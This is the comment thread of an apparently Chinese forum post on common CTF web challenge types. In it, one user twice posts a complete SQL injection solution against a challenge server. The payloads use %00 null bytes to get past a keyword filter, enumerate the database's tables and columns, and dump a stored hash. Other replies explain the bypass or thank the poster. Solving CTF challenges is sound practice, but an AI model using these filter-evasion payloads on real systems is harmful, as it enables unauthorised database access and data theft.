CTF常见Web题型

Mr.轻熟男 · 2019-1-1 16:00:31

没赶上？~这怎么都看不到了？~~

mtller · 2018-12-28 11:00:29

错字体有一点

v5pingan · 2018-8-8 21:24:16

iossa 发表于 2017-9-6 13:02
求解第一题web题

过程如下：

获取数据库  结果为 sql3
http://103.238.227.13:10087/?id=-1 un%00ion se%00lect 3,database()#

获取表结果为  hash,key,temp
http://103.238.227.13:10087/?id=-1 un%00ion se%00lect 3,group_concat(ta%00ble_name) fr%00om info%00rmation_schema.ta%00bles where ta%00ble_schema=database()#

获取字段 key 表中的字段结果为 id,hash
http://103.238.227.13:10087/?id=-1 un%00ion se%00lect 3,group_concat(column_name) fr%00om info%00rmation_schema.columns where ta%00ble_schema='sql3' a%00nd ta%00ble_name='key'#

获取最后结果  1:c3d3c17b4ca7f791f85e#$1cc72af274af4adef    (0x3a == : )
http://103.238.227.13:10087/?id=-1 un%00ion se%00lect 3,group_concat(id,0x3a,hash) fr%00om sql3.key#

v5pingan · 2018-8-8 21:21:25

tmdsb123 发表于 2017-5-10 03:00
惭愧啊，第一个注入都解不出来，注入：http://103.238.227.13:10087/
过滤了select和from 的情况下还怎么 ...

过程如下：

获取数据库  结果为 sql3
http://103.238.227.13:10087/?id=-1 un%00ion se%00lect 3,database()#

获取表结果为  hash,key,temp
http://103.238.227.13:10087/?id=-1 un%00ion se%00lect 3,group_concat(ta%00ble_name) fr%00om info%00rmation_schema.ta%00bles where ta%00ble_schema=database()#

获取字段 key 表中的字段结果为 id,hash
http://103.238.227.13:10087/?id=-1 un%00ion se%00lect 3,group_concat(column_name) fr%00om info%00rmation_schema.columns where ta%00ble_schema='sql3' a%00nd ta%00ble_name='key'#

获取最后结果  1:c3d3c17b4ca7f791f85e#$1cc72af274af4adef    (0x3a == : )
http://103.238.227.13:10087/?id=-1 un%00ion se%00lect 3,group_concat(id,0x3a,hash) fr%00om sql3.key#

Aoyanm · 2018-8-7 09:34:45

学习学习

leesun · 2018-7-29 12:22:29

不错，学习了。

MelodYou · 2018-7-1 09:52:02

看着眼有点晕晕的

Mr_Zthan · 2018-5-25 09:21:56

tmdsb123 发表于 2017-5-10 03:00
惭愧啊，第一个注入都解不出来，注入：http://103.238.227.13:10087/
过滤了select和from 的情况下还怎么 ...

%00绕过关键字过滤，sel%00ect，fr%00om

sss · 2018-5-16 09:51:22

好多链接失效了

triumph · 2018-5-8 12:53:51

谢谢楼主学习了